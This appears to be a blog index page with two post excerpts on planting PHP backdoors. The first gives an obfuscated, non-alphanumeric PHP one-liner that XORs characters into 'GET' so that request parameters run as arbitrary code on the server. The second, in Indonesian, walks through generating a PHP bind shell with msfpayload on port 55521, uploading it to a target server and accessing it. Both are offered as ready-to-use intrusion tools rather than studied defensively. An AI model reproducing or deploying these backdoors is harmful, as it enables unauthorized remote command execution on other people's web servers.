Non-alphanumeric PHP Simple Backdoor
After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">").($_^"/"); #XOR = GET ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?> well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. put the result in one-liner code execution and done. Another version with “<pre>” tag. <? $_="{"; #XOR...
read moreMembuat php bindshell (backdoor) dengan Metasploit
Ingin membuat sebuah php bindshell dengan mudah..?? metasploit adalah sebuah tool yang sangat powerfull, termasuk dalam urusan membuat php bindshell. Berikut ini langkah-langkah mudahnya: [+] Buat Bindshell. # msfpayload php/bind_php LPORT=55521 R > kutu.php KET: Perintah diatas akan membuat sebuah script php (kutu.php), yang berfungsi untuk membuat sebuah bindshell(backdoor) di port 55521 [+] Edit script php kita (kutu.php), lalu tambahkan tag php pada awal dan akhir script. [+] Upload script ke server target. [+] Akses script php yang sudah kita upload pada server target, melalui web...
read more